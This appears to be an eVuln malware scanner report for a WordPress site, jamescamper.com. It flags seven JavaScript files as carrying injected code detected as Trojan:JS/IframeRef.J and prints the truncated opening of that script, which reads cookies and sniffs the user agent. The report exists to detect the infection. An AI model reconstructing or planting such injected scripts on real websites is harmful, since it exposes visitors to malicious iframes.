New scan:

Malware Scanner report for jamescamper.com

Malicious/Suspicious/Total urls checked
7/0/16
7 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/11
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://jamescamper.com/
200 OK
Content-Length: 33559
Content-Type: text/html
clean
http://jamescamper.com/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 94633
Content-Type: text/javascript
clean
http://jamescamper.com/wp-content/plugins/wp-video-lightbox/js/jquery.prettyPhoto.js?ver=3.1.4
200 OK
Content-Length: 26191
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3233 bytes are skipped ...
ngth)):false;return hashtag;};function setHashtag(){if(typeof theRel=='undefined')return;location.hash=theRel+'/'+rel_index+'/';};function clearHashtag(){if(location.href.indexOf('#prettyPhoto')!==-1)location.hash="prettyPhoto";}
function getParam(name,url){name=name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");var regexS="[\\?&]"+name+"=([^&#]*)";var regex=new RegExp(regexS);var results=regex.exec(url);return(results==null)?"":results[1];}})(jQuery);var pp_alreadyInitialized=false;

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://jamescamper.com/wp-content/plugins/wp-video-lightbox/js/video-lightbox.js?ver=3.1.4
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://jamescamper.com/test404page.js
404 Not Found
Content-Length: 20287
Content-Type: text/html
clean
http://jamescamper.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3
200 OK
Content-Length: 10961
Content-Type: text/javascript
clean
http://jamescamper.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995
200 OK
Content-Length: 27565
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3088 bytes are skipped ...
fn.cycle.commonReset(b,c,d,true,true,false);d.cssAfter.display="block";var i=1,j=parseInt(d.speedIn/13,10)-1;(function o(){var a=k?k-parseInt(i*(k/j),10):0;var b=n?n-parseInt(i*(n/j),10):0;var c=m<f?m+parseInt(i*((f-m)/j||1),10):f;var d=l<e?l+parseInt(i*((e-l)/j||1),10):e;h.css({clip:"rect("+a+"px "+d+"px "+c+"px "+b+"px)"});i++<=j?setTimeout(o,13):g.css("display","none")})()});a.extend(d.cssBefore,{display:"block",opacity:1,top:0,left:0});d.animIn={left:0};d.animOut={left:0}}})(jQuery)

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://jamescamper.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06
200 OK
Content-Length: 2766
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 1689 bytes are skipped ...
gt;img.height*maxWidth){if(img.width>maxWidth){width=maxWidth;height=Math.round(img.height/img.width*maxWidth)}}else{if(img.height>maxHeight){height=maxHeight;width=Math.round(img.width/img.height*maxHeight)}}jQuery(img).css({'height':height,'width':width});return img};function jCycle_onBefore(curr,next,opts){if(opts.addSlide)if(stackLength>0){var img=new Image();img.src=stack.shift();stackLength--;jQuery(img).bind('load',function(){opts.addSlide(imageResize(this,s.width,s.height))})}}}

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://jamescamper.com/wp-content/themes/catch-everest/js/catcheverest-ielte8.min.js?ver=20130114
200 OK
Content-Length: 19097
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3092 bytes are skipped ...
etTimeout(function(){d.style.marginTop=""},2e4);return function(){if(!i()){cssHelper.addListener("newStyleParsed",function(e){l(e.cssHelperParsed.mediaQueryLists)});cssHelper.addListener("cssMediaQueriesTested",function(){if(ua.ie){d.style.width="1px"}setTimeout(function(){d.style.width="";d.style.marginLeft=""},0);cssHelper.removeListener("cssMediaQueriesTested",arguments.callee)});s();c()}else{d.style.marginLeft=""}p()}}());try{document.execCommand("BackgroundImageCache",false,true)}catch(e){}

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://jamescamper.com/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6
200 OK
Content-Length: 30341
Content-Type: text/javascript
clean
http://jamescamper.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.36.0-2013.06.16
200 OK
Content-Length: 15479
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3230 bytes are skipped ...
eset.nodeType)&&this.reset()})},e.fn.enable=function(e){return void 0===e&&(e=!0),this.each(function(){this.disabled=!e})},e.fn.selected=function(t){return void 0===t&&(t=!0),this.each(function(){var r=this.type;if("checkbox"==r||"radio"==r)this.checked=t;else if("option"==this.tagName.toLowerCase()){var a=e(this).parent("select");t&&a[0]&&"select-one"==a[0].type&&a.find("option").selected(!1),this.selected=t}})},e.fn.ajaxSubmit.debug=!1})(jQuery);

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://jamescamper.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.4.2
200 OK
Content-Length: 8081
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3371 bytes are skipped ...
ind('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked');
$(this).find('span.wpcf7-not-valid-tip').remove();
$(this).find('img.ajax-loader').css({ visibility: 'hidden' });
});
};
$.fn.wpcf7FillResponseOutput = function(message) {
return this.each(function() {
$(this).find('div.wpcf7-response-output').append(message).slideDown('fast');
});
};
})(jQuery);

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://jamescamper.com/wp-content/themes/catch-everest/js/catcheverest-menu.min.js?ver=20130224
200 OK
Content-Length: 9161
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3081 bytes are skipped ...
s[0]].concat(n))}if(t=="option"&&arguments.length==2&&typeof arguments[1]=="string"){return e.selectbox["_"+t+"Selectbox"].apply(e.selectbox,[this[0]].concat(n))}return this.each(function(){typeof t=="string"?e.selectbox["_"+t+"Selectbox"].apply(e.selectbox,[this].concat(n)):e.selectbox._attachSelectbox(this,t)})};e.selectbox=new s;e.selectbox.version="0.2"})(jQuery);jQuery(".menu").tinyNav({active:"current-menu-item",header:""});jQuery(function(){jQuery(".tinynav").selectbox()})

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://jamescamper.com/biography/
200 OK
Content-Length: 25403
Content-Type: text/html
clean
http://jamescamper.com//platform.twitter.com/widgets.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Tue, 03 Mar 2015 16:16:26 GMT
Pragma: no-cache
Location: http://jamescamper.com/platform.twitter.com/widgets.js/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://jamescamper.com/xmlrpc.php
clean
http://jamescamper.com/platform.twitter.com/widgets.js/
404 Not Found
Content-Length: 20287
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jamescamper.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 16:16:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://jamescamper.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: jamescamper.com
Referer: http://www.google.com/search?q=jamescamper.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jamescamper.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jamescamper.com/

Result: jamescamper.com is not infected or malware details are not published yet.